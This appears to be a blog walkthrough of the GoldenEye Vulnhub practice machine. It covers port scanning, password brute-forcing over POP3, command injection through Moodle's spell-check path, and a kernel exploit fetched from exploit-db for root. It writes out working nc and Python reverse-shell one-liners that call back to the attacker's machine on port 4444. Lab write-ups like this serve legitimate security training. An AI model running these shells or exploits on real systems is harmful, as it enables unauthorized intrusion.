GoldenEye 1 Walkthrough: Vulnhub vulnerable machine

This article is a walkthrough for GoldenEye vulnerable machine. In the description of this machine, it says that it is similar to OSCP machine. So, I have written a walkthrough on it.

To download Goldeneye 1, follow the link: https://www.vulnhub.com/entry/goldeneye-1,240/

Requirements:

  1. Kali Linux or your favorite OS
  2. Virtualbox
  3. Goldeneye VM
  4. Patience

So let’s dig in:

  1. Find out the IP address of the vulnerable machine
    1. using VMware: http://www.anonhack.in/2018/06/part-2-finding-the-ip-address-of-your-victim-in-your-vmware-hacking-lab-network/
    2. using Virtualbox: http://www.anonhack.in/2018/06/finding-the-ip-address-of-your-victim-in-your-hacking-lab-network/**My ip address for this machine keeps changing, So it might be different in different screenshots, don’t be alarmed.
  2. A quick nmap on the ip address gave me this output:

    goldeneye nmap

  3. As you can port 80 is open, we have to see what the website says:

    Goldeneye webI visited the /sev-home/ but it is asking for a password. So I viewed the source code, looking for some information:Goldeneye web1 The above screenshot of the source code shows nothing, but there is a terminal.js file, Let’s see what we can find there:Goldeneye web1 The file terminal.js contains the code for the typing effect on the main page and also there is commented encoded password above it.
    The letter that you see are encoded in ASCII code and when you decode them, you will find password:
    InvincibleHack3r

  4. Now that we have password and username as Boris, we can try logging into /sev-home/.Goldeneye sev-home1Goldeneye sev-home
    If you read what is written in the above screenshot, it says they have configured a pop3 service on the higher port.
    Our nmap scan tells us 55006 and 55007 have pop3 services running.
  5. I checked port 55007, you can enumerate users using those, I manually did that for user Boris.
  6. The SMTP relay is turned on, you can send messages using SMTP server port 25, but we don’t that.
  7. So, I fired up metasploit to enumerate pop3_login for boris and natalya if we could find any.
    Command: >msfconsole
    >use auxiliary/scanner/pop3/pop3_loginGoldeneye boris pop3
    Goldeneye bob message
    I found 3 messages here, but not much information on it. So I am stranded again.
  8. A quick nikto scan on the server, gave me this output:goldeneye nikto
    Found /splashadmin.php page. I went to that page, this is what it looks like:
    splashAdmin
    I went to source code, found nothing important but then I saw this message by admin, It says that GCC is not installed on their server but to run c language they have application which FreeBSD uses, So I searched about it and found clang, that can be installed instead of gcc.
    splashAdmin
  9. Still lost, I remember I have natayla user and checked her for pop3 login. Bruteforcing natayla with fasttrack.txt wordlist, gave me the password Natayla as bird.natalya goldeneye pop3So I logged in pop3 with natalya’s credentials.Goldeneye natayla pop3 1Found username and password for xenia user and also found way to access their internal domain.

    Goldeneye natayla pop3 2
    severnaya-station godleneyeI couldn’t access it with just the ip address, I need to have internal domain credentials follows.
    I have changed the /etc/hosts file of my kali and put 192.168.0.106 www.servernaya-station.com on it.
    /etc/host internal domain goldeneye
    Now, I can access the outr internal domain:
    Goldeneye web view
  10. I logged in with Xenia credentials above:
    Xenia goldeneye Xenia goldeneye
    I checked ll around the account, found nothing suspicious, tried to upload a shell but it wasn’t working so I dig deeper, In the above screenshot, you will see a New message from Dr. Doak. Goldeneye message
    Here, I found a new user for pop3 login bruteforce, doak.

    doak passwordgoldeneye
    doak web
    Now, we can login into dr_doak’s account with password 4England!.
  11. I searched for a while and found this in private files menu.base64 Goldeneye secret
    secret file goldeneye
    let’s visit /dir007key/for-007.jpg
    I found this image:
    007 goldeneyeWhenever you see such images, always check for stegnography, So I checked the Hex code of the image using xxd, you can also use exif.


    The code you see above seems like a base64 encode, So I encoded it and here is the admin password:base64 Goldeneye
  12. Login to moodle using admin credentials as password xWinter1995x!
    I searched everywhere for a certain code injection or shell execution and finally I got my eyes here on “server –> system path”:
    systempath goldeneye
    Here I can run code because it will be running as a command injection and might be able to gain shell. So I tried
    nc – /bin/sh 192.168.0.107 4444
    where 192.168.0.107 is the address of my kali machine attacking one. and 4444 is the listening port.
    nc reverse shell, you can also choose perl or python:
    http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
    ***Go to My profile and Blog and add a new entry and click on spell check icon.


  13. On my kali machine I opened terminal and start a listener sing netcat: nc -lvp 4444
    It didn’t give me any shell
  14. I then tried python shell because nc might not be installed in the Goldeneye server.
    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.107",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

    Nothing happened, it didn’t give me any shell.
    So I tried with various plugins, saw php info and finally saw some useful settings in plugins
    In the Text editor–> tinyMCEHTML –>settings, you will find that the spell checker is google spell by default and that is why the path that we are entering here is not working, So I changed it to pshellspell.

  15. I then used nc reverse shell again but it gave me nothing and finally tried the python shell again and I got the shell.
    and

    There you go! I got a shell finally.
  16. I quickly spawn a python pty bin/bash so I can work in a fully functional environment:
    python -c ‘import pty;pty.spawn(“/bin/bash”)’
    Once done this is the screen that will appear:
  17. I looked around the /var/html directory and found these files. It seems like the keys.

    I have used online meta convertor for this key.webm file but found nothing.
    So I looked at the gif versions of it and found this in xvf7-flag directory:

    Seems like we have captured the flag. But I still don’t have root access and in the boris email, it was written that janus has asked boris to put the flag in /root/ direcroty. So I started looking for kernel version.
    uname -a command gave me the linux version and kernel version. 
  18. I searched for 3.13.0-32 kernel exploit on google and found this exploit:
    https://www.exploit-db.com/exploits/37292/
    I got to the tmp directory by command — cd /tmp/
    and downloaded this exploit using wget https://www.exploit-db.com/download/37292.c
  19. Now remember that we do not have gcc compiler here, we have clang compiler, so I compiled it using command:
    clang 37292.c
    I got 5 warnings, but not errors. So I think it ran successfully!
    running the output:
    ./a.out
    This gave me error, the error says that while spawning child threads, it runs a gcc command, but gcc is not installed in the system. A code screeenshot where it run a system command using gcc. 
  20. So I thought to replace gcc with clang so it won’t generate such errors.
    I ran command to replace the word gcc with clang:
    sed -i ‘s/gcc/clang/g’ 37292.c
    Explanation: s for substitute/ gcc means original word / clang means the new word/ g means globally replace it means replace all.I ran it again with 5 warnings again but not errors.
    then ./a.out
    and viola! we go the root!
    Now that we finally have the root, I went to directory /root/ to get the flag.
    and there is .flag.txt hidden file.The flag points to the same directory and gif that we already been through and it is :


    That’s all!

1 thought on “GoldenEye 1 Walkthrough: Vulnhub vulnerable machine

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.